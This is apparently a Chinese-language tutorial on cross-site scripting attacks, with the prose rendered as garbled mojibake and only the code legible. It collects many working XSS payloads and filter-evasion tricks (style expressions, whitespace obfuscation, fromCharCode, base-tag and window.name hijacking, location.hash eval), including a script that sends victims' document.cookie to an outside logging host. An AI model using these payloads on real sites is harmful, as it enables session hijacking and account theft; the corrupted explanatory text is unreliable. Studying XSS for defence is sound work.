XSSվű̽
XSSվűĻԭSQL ע빥ƣ˹۵㣩ϵͳִδ˵Σմ룬ͬXSSһֻҳűע뷽ʽҲǽűغдҳִԴﵽҳͻ˷ûĿģڿͻ˹SQLע빥ΣմƹıΪִеSQLִӶݿ⣬Ӷһ̽⡢ݿϢڷXSSǰࣨXSS bug ⣩
1XSS bugȻ
<script>alert(/XSS/)</script>
ڴXSS bugдԢ,ҳʱᵯԻ:
䱻ԭдҳִ.ôǾлִǵĽűغ:
<script src = http://www.labsecurity.org/xssbug.js></script>
ǵռwww.labsecurity.orgϵxssbug.js
Var img = document.createElement(img);
Img.src = http://www.labsecurity.org/log?+escape(document.cookie);
document.body.appendChild(img);
ϴ˳ִ,ôĿվĵ¼cookieдlog.õcookie,·ͿԱݵ¼Ŀվ.(߿ͨûҲʹվԱ).
ȡcookieĴ뻻ߵַͿԽص߹©û.
ҲԽ뻻ĿûվϵijЩ ݰű.ʹڲ֪¡ԸijЩ.
Cookieȡķʹɣаȷˣ
ȻڣأӣӹôԱڿʱȻijЩΣչؼֵĹˣԼû볤ȣʹڣ©ȣҲֻܼ⣬ȴܹд빥غɣư
IMGͼƬԿվ
ȻҲ˵
<img src=javacript:alert(/XSS/)></img>
˵IJûϴͼƬʱͼƬ·ΪһοִеXSSԽű.
XSS©ôűͻᱻִ.űҪպ˫š>.
DIVǩԿվ
<div style=width:0;height:0;background:url(javascript:document.body.onload = function(){alert(/XSS/);};></div>
֪¼
ƶЧ<marquee></marquee>
<marquee onsB.<div style= onmouseenter=alert(/XSS/)></div>
¼
<img style=# style=TEST:e­xpression(alert(/XSS/));>
õ¼
<font style = TEST:e­xpression(alert(/XSS/))></font>
<li style = TEST:e­xpression(alert(/XSS/))></li>
<table style = TEST:e­xpression(alert(/XSS/))></table>
<a style = TEST:e­xpression(alert(/XSS/))></a>
<b style = TEST:e­xpression(alert(/XSS/))></b>
<ul style = TEST:e­xpression(alert(/XSS/))></ul>
<marque tyle = TEST:e­xpression(alert(/XSS/))></marquee>
ͻƳԱĹ
javascriptոͻƹ
<img src = j ava script:al er t(/XSS/)>///ոʹTab
<img src = j
ava script :a ler t(/xss/)>
ע<img src = #/**/onerror = alert(/XSS/)>
ת,ƹ
ʹôСдתƹ
ʹýƱ
ոس
JS ԭ
String.fromCharCode()ԽASCII뻹ԭַ,ôͿeval(String.fromCharCode(97,108,101.....))
ͻƳ
עͷպڵﵽϲĿ
<input id = 1 type = text value=/>
<input id = 2 type = text value = />
ǿڵһ롱>alert<!--
ڵڶ--><script>(/XSS/);</script>
Ч
<input id = 1 type = text value= <script>alert(/XSS/)</script>/>
ʹ<base>ǩ·ٳ
<body>tart=alert(/XSS/)></marquee>
<base href=http://www.labsecurity.org/>
<img src = evil.js>
<body>
ûʹbaseǩʱevil.jsǵõķĿ¼µevil.jsűļ.ʹ<base>ű.ôڴ˱ǩ·Ϊõվ.
˿ʹ<base>űٳ,Ȼд<img src=xxx.js>ͻƳ.
ʹwindow.nameַ
ԼĹҳд´
<script>
Window.name=<script src=http://www.labsecurity.org/xss.js><script>
Window.location=http://www.xxxx.com/xxx.asp
</script>
תĿҳʱǵwindow.nameֵΪõĿվű.
ǿʹeval(name)пվ.
չ
<div id="x">alert%28document.cookie%29%3B</div>
<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
DzƳȵİȫ,ôǾͿʹô˰ȫ.XSSͻƳ.
5.URL е
ҳﲻһ˵ĿɿHTML ô죿Щɿصģһ뵽ľURLͨURL βҪִеĴ룬ȻXSSͨ
document.URL/location.href ȷʽôִУӵ80 ַʼ
--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)
<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
ȣ30
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
ȣ31
ӶԱȣǰһӸ̣ôûа취أͨJavascript ֲ
String ķԷ֣иַһ̵ĺslice5 ַsubstr Ҫһַ
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
ȣ29
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
ȣ30
ôûа취أYESһMSND location IJοᷢиhash Աȡ#֮ݣôǿҪִеĴ#棬ȻͨhashôִУڻõ#ͷģֻҪslice һַͿõ룺
http://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)
<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
ȣ29
һַôԸô
6.аclipboardData
ԼҳͨclipboardData Payload да壬ȻڱXSS ҳȡִиݡ߹ҳ棺
--code-------------------------------------------------------------------------
<script>
clipboardData.setData("text", "alert(document.cookie)");
</script>
-------------------------------------------------------------------------------
XSS ҳ棺
--code-------------------------------------------------------------------------
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
-------------------------------------------------------------------------------
ȣ36
ַʽֻIE ϵУIE 7 ϰ汾аȫʾ
ҳ:
[1]